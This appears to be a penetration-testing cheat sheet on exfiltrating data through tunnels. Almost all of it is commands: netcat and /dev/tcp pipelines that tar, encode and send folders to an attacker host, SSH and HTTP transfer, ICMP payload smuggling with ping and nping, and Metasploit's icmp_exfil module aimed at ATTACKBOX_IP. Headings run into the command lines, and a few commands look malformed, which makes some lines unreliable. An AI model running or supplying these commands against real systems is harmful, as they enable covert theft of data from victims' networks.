Good for testing outbound communication (Code Execution)
TCP Tunneling
Using simple TCP with netcat
# Listen on p. 1337 & redirecting incoming data to a file
nc -lvp 1337 > ./received_data
# Sending compressed data
# (EBCDIC is conversion from ASCII)
tar zcf - Folder/ | base64 | dd conv=ebcdic > /dev/tcp/<IP>/<ListeningPort>
echo "hello world" | base64 > /dev/tcp/<ip>/<port>SSH Tunneling
Simply sending over data through SSH without holding the session:
# Sending a Tarball through SSH and decompressing it when SSH'ing
tar cf - DIRECTORY/ | ssh user@host "cd some_folder; tar xpf -"HTTP Tunneling
Tunneling data over HTTP via API POST requests with cURL, wget, etc.
Sample Web Servers (The interesting one is the Flask one):
ICMP Tunneling
Sending additional packets through ICMP:
# Convert payload to Hex example:
Echo "Hello" | xxd -d
# Send Hex code through ping:
ping -c 1 <IP> -p 4141414141
ICMPDoor: ICMP Tunneling
Nping: Network Packet Generation
Using Metasploit
msf5 > use auxiliary/server/icmp_exfil
msf5 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src (MY IP)
BPF_FILTER => icmp and not src (MY IP)
msf5 auxiliary(server/icmp_exfil) > set INTERFACE eth0
INTERFACE => eth0
msf5 auxiliary(server/icmp_exfil) > runicmp_exfil requires an EOF and BOF end termination:
# "BOF" + New File that will be registered by msf to write
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "BOFnew_file.txt"
# Several or a single string to send into the packets:
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "MESSAGE"
# EOF so Msf knows when to stop and save the file
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"